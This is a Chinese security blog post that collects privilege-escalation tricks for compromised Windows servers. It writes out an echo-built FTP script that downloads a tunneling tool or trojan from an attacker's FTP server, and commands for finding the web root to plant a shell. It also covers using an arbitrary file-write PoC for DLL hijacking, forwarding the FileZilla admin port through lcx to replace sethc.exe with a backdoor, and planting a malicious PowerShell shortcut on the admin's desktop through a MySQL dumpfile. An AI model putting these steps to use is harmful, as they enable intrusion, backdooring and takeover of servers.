蜗蜗侠's Blog-关注网络安全移动版

主页 > 黑客/白帽 > 提权技巧 >

那些提权测试中的奇淫技巧

前言
引上篇尾语
哪里有真正的总结,这不,又来了。
 
目录
0x01 内网sa低权、内网注入点可os-shell情况适用
0x02  同第一个问题,但是站、库一体
0x03 目录权限的猥琐利用
0x04 FTP的一些利用方式
0x05 快捷方式调用powershell隐藏执行命令
 
正文
0x01 内网sa低权、内网注入点可os-shell情况适用
(后者情况如是站裤分离,则目标机为数据库服务器)
 

mysql或许可以分割hex导出一个shell或lcx上去,mssql则不能
那么可以选择ftp,那么就会有人问你不是nc反弹的交互式,如何输入ftp密码?
其实可以批量执行,echo追加写文件,称为ftp下载者
先在外网搭建个ftp,帐号密码123,根目录放lcx或者是你的远控exe
[AppleScript] 纯文本查看 复制代码
?
1
2
3
4
5
6
echo open Ftp-ip>ftp.TXT //连接FTP
echo 123>>ftp.TXT       //输入用户名
echo 123>>ftp.TXT       //输入密码
echo get lcx c:lcx.exe>>ftp.TXT //执行下载命令
echo bye>>ftp.TXT             //退出
ftp -s:ftp.txt                //执行FTP.TXT文件中的FTP命令
然后你懂得
可以直接在下载到的路径运行你的muma或者lcx
 
0x02  同第一个问题,但是站、库一体
目标是web服务,当然可以用以上方法直接上服务器,但是问题来了,如果你的东西不免杀,或者他的ftp不可用咋办。
退而求其次,可以尝试echo往web目录shell,问题又来了,你没有web物理路径。
路径可以通过搜索文件得到,主页右键看源码得到一个生僻的js文件
 
[AppleScript] 纯文本查看 复制代码
?
dir /s/b 驱动器号:\example.js
驱动器ABCDEFG随便试试如果存在,会返回一个具体的绝对路径



接下来的事就不必多说了,双引号不影响脚本使用



0x03 目录权限的猥琐利用

比较累,不细说。拿到shell,可执行,但权限死,各种不成功可以试试微软的那个写入任意任意文件夹的0day,补丁就算了。
poc:https://github.com/monoxgas/Trebuchet

用法
Trebuchet.exe D:\1.txt c:\web\binghesec.asp

win8.1+net4.0测试效果(目录我已经设置了sys权限)


你也许会认为:“那又怎么样?你只是可以写入任意文件而已。
那我也只能呵呵
那么我们可不可以来个lpk.dll劫持?可不可以。。。
那么某些情况下的跨目录旁站写shell岂不是轻而易举?

0x04 FTP的一些利用方式

拿到shell后,权限很死,提权一筹莫展,程序的安装目录虽不可修改但可以访问,还可以下载。
如果遇到ftp等字眼,也许这就是转机。
-------------------------------------------------------------------
1.ServU和G6 FTP这类的数据库有默认口令,有时候还可以看配置文件,或者反编译servuadmin.exe得到口令,可以间接执行命令,不再多说。
2.filezilla这类ftp服务一般不允许外部IP连接,可以把lcx端口转出来再连接(他的默认服务端口是14147)。把整个目录打包到本地,避免版本错误。
自己的vps执行:
[AppleScript] 纯文本查看 复制代码
?
lcx.exe -l 3333 4444

再将服务端的14147端口转发到lcx监听的3333端口上,可以用脚本 ,也可以用lcx



在vps上打开打包的Filezilla,连接端口4444,连上之后就相当于在他服务器上打开ftp一样,现在来创建个C盘的ftp服务,然后上传一个你改写的sethc.exe替换c:\windows\system32目录的sethc.exe,然后你懂得


3.flashfxp这类的FTP服务,虽可以配置文件看到密码,但是可以整个软件目录打包到本地,然后打开用星号查看器得到密码,这个服务也许权限不太高,但有可能用来爆破其他服务的密码。


 
0x05 最近比较火的一种新型的攻击方式,快捷方式调用powershell隐藏执行命令
 
已有利用工具,来自俄罗斯的黑阔,感谢吐司大牛分享出来。


 
url一栏是打开快捷方式时私密打开的程序,最后一栏是前台打开的程序,其他任意,图标可更换
看下效果,果然生猛!





你可以用他恶作剧,我们来用他提权。
url填木马地址,start process填ie浏览器的或者其他桌面的图标,生成之后,替换桌面,然后。。。。
有的小伙伴就会问了,能替换到桌面图标了,权限就够高了,还提权干嘛,我说:低权限请参考本文0x03
另外我们可以结合mysql的导出功能,当udf失败时可以用,现在高版本的mysql都不能udf提权了,我给大家做个例子
生成快捷方式之后存在本机磁盘,例:e:\IE
然后

[AppleScript] 纯文本查看 复制代码
?
select hex(load_file('e:/ie')) into dumpfile 'e:/1.txt';

打开e:\1.txt,复合里面16进制内容的code
然后在目标的mysql执行

[AppleScript] 纯文本查看 复制代码
?
select 0x(code,不需要括号) into dumpfile '目标桌面的IE快捷方式路径';

这样。当管理员在服务器开IE时,就。。。,
 
总结:
渗透测试所遇情况千变万化,哪里有真正的总结
仅作测试,请勿非法攻击。 (责任编辑:蜗蜗侠)